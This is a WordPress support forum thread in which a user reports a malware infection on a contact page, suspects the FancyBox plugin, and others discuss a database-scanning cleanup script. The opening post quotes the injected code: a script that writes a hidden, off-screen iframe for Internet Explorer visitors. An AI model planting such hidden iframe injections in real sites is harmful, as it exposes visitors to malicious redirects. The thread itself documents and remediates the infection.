Support » Plugin: FancyBox for WordPress » Possible malware

  • Resolved SherabGyamtso


    I have last version of your plugin and WordPress.

    Everything was ok until today. I’ve got a report from sitelock that my Contact page on my blog is infected with malware with iframe redirecting to h t t p : / /

    Chcecked my page source on this contact page and found something like this:

    <script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(‘ <div style=”position:absolute;left:-2000px;width:2000px”><iframe src=”; width=”20″ height=”30″ ></iframe></div>’);}/*]]>*/</script>

    I desactivated just Total Cache and this page is not infected anymore.

    I have other plugins (up to date) active:

    Akismet Version 3.0.4
    Custom Posts Per Page Version 1.7.1
    FancyBox for WordPress Version 3.0.2
    GetSocial Version 2.0.1
    NextCellent Gallery Version
    Official StatCounter Plugin Version 1.6.9
    Use Google Libraries Version 1.6.2
    WordPress SEO Version 1.7.1

    Can anybody helps me to determine source of this malware?



Viewing 5 replies - 106 through 110 (of 110 total)
  • @besso Thanks, will give it a try since I know fancybox was previously installed.

    Edit – Had to install a package due to an error I was getting.
    sudo apt-get install python-mysqldb

    Traceback (most recent call last):
      File "./", line 3, in <module>
        import sys, getpass, MySQLdb as mdb
    ImportError: No module named MySQLdb

    Searched for ImportError: No module named MySQLdb to find the answer to getting this to work. It however says it only searched 1 wordpress installation when I have much more.

    * Checking 1 WordPress installations
     ... looking good today :)

    Thanks for the feedback. Are you using non-standard naming (prefix) for WordPress database tables, e.g. anything other than wp_options?

    Updated version can be found at, it allows you to manually define any WP databases that are using non-standard table prefixes.

    @besso I specify for most of my installations what I want them to be. Will try the updated version when I get a chance. Is there a way to parse that info from wp-config files on the server? Just a thought. Thanks.

    Yes, I thought so.

    The script is location agnostic (blind) – it doesn’t use the underlying filesystem in any way, but identifies WordPress databases by searching for pfx_options db table (wp_options by default) inside informationSchema to build the initial list.

    You can also use it to fix issues on any MySql server that allows you to connect remotely with sufficient privileges.

Viewing 5 replies - 106 through 110 (of 110 total)
  • The topic ‘Possible malware’ is closed to new replies.